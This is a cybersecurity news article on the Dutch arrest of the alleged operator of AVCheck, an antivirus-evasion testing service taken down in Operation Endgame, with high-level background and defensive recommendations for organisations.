Dutch law enforcement has arrested a 33‑year‑old national suspected of running AVCheck, an online malware testing and antivirus evasion platform widely used by cybercriminals. The service, which allowed attackers to fine‑tune malicious code to bypass security tools, was taken offline in May 2025 during the international cybercrime operation Endgame.
Arrest at Schiphol and Links to the AVCheck Malware Testing Service
According to the Dutch Public Prosecution Service (Openbaar Ministerie, OM), the suspect was detained at Amsterdam’s Schiphol Airport. His name has not been disclosed. Investigators state that he left the Netherlands for the United Arab Emirates shortly after AVCheck was shut down and was placed under international surveillance before his arrest.
During the operation, authorities seized multiple data carriers and electronic devices for digital forensics. These will be examined to map AVCheck’s infrastructure, identify customers, and determine whether the platform was linked to specific malware campaigns or ransomware attacks.
Prosecutors associate the suspect with two corporate entities that allegedly acted as front companies for selling access to AVCheck. This “shell company” approach is typical in cybercrime infrastructure: services are publicly framed as legitimate “security testing” or “penetration testing” tools while in practice being marketed in underground forums as crimeware‑as‑a‑service offerings.
What Was AVCheck? Inside a Malware QA and Antivirus Evasion Platform
Investigators describe AVCheck as one of the largest international services for testing and bypassing antivirus and endpoint protection. The platform enabled users to upload malware samples and check whether they were detected by a range of commercial antivirus (AV), EDR (Endpoint Detection and Response) and other security products.
In concept, AVCheck played a role for attackers similar to that of legitimate penetration‑testing or red‑team platforms for defenders. Instead of verifying that security tools correctly block threats, criminals used AVCheck to iteratively refine malware until it no longer triggered signature‑based or behavioral detections.
Unlike public multi‑scanner services that share samples with security vendors, underground anti‑AV platforms typically operate as “no‑distribute” services. They promise customers that uploaded samples will not be forwarded to antivirus companies, thereby preventing rapid signature updates and significantly extending the malware’s lifetime.
Why Antivirus Evasion Services Pose a Critical Cybersecurity Risk
Modern cybercriminal operations resemble professional software development teams. They version their tools, track detection rates, and run quality assurance (QA) against security stacks before launching campaigns. Anti‑AV platforms such as AVCheck are a core component of this workflow.
By pre‑testing payloads, threat actors can:
- Increase dwell time — undetected malware can persist in victim networks for weeks, enabling data theft, lateral movement, and ransomware staging.
- Systematically evade defenses — code is iteratively modified until it bypasses firewalls, email filters, EDR rules, and sandboxing solutions.
- Complicate incident response and forensics — heavily obfuscated and tested malware leaves fewer reliable indicators of compromise for defenders to pivot on.
Industry threat reports from organizations such as ENISA and Verizon regularly note a trend toward customized, well‑tested tooling in major intrusions and ransomware incidents. Platforms like AVCheck accelerate this trend by making advanced detection‑evasion capabilities accessible even to relatively inexperienced actors.
Operation Endgame: Targeting the Cybercrime Ecosystem, Not Just Individual Hackers
The shutdown of AVCheck on 27 May 2025 forms part of the second wave of Operation Endgame, a coordinated international law‑enforcement campaign led by the Netherlands, the United States, Finland and other partners. Rather than focusing solely on specific ransomware groups or botnet operators, Endgame targets the infrastructure layer that underpins large‑scale cybercrime.
This includes bulletproof hosting, botnets, loaders and droppers, command‑and‑control (C2) panels, and specialized services such as malware testing platforms. By removing these enablers, authorities seek to disrupt entire ecosystems rather than just individual campaigns.
The AVCheck case also highlights a broader strategic shift: geographical borders are becoming less effective as a shield for cybercriminals. Even when suspects move to jurisdictions with different legal frameworks, mutual legal assistance, joint task forces, and intelligence sharing increasingly enable cross‑border tracking and arrests.
Pressure on the Crimeware‑as‑a‑Service Model
From a security perspective, the most important impact of such operations is on the crimeware‑as‑a‑service (CaaS) model. In CaaS ecosystems, one group develops malware, another provides infrastructure and operational tools, and affiliates execute attacks for a share of the profits. This division of labor lowers the barrier to entry and industrializes cybercrime.
Removing services like AVCheck raises the cost and complexity of running campaigns. Threat actors must migrate to smaller, more closed darknet communities, invest in proprietary testing labs, or build replacement platforms. All of these options demand more expertise, time and money, and increase the likelihood of operational mistakes that defenders and law enforcement can exploit.
What Organizations Should Expect After the AVCheck Takedown
The arrest of the alleged AVCheck operator is unlikely to end malware QA and antivirus evasion. A portion of this capability will almost certainly move to private or invite‑only services, bespoke testing environments, and tightly controlled underground markets.
Enterprises should therefore assume that any serious intrusion attempt has been pre‑tested against common security products. Effective defense depends less on any single tool and more on a resilient, layered architecture and mature operational processes.
Key measures include:
- Defense‑in‑depth: hardened endpoints, network segmentation, strict privilege management, and monitored remote access pathways.
- Behavioral and anomaly‑based detection: EDR, NDR and SIEM rules that spot suspicious patterns and living‑off‑the‑land techniques, not just known signatures.
- Proactive testing: regular red‑teaming and purple‑teaming exercises to validate how well controls stand up to realistic attacker techniques, including AV‑evasion tactics.
- Updated security policies and playbooks: procedures that reflect modern attacker methods such as fileless malware, LOLBins, and multi‑stage loaders.
The AVCheck investigation underlines a crucial development in cyber defense: law enforcement is increasingly dismantling the services and infrastructure that make large‑scale cybercrime possible. At the same time, organizations cannot rely solely on external actions. Building robust monitoring, continuous security assessments, and a culture of incident readiness remains essential. Assuming that adversaries have already tested their tools against standard protections is a realistic starting point for any serious cybersecurity strategy.
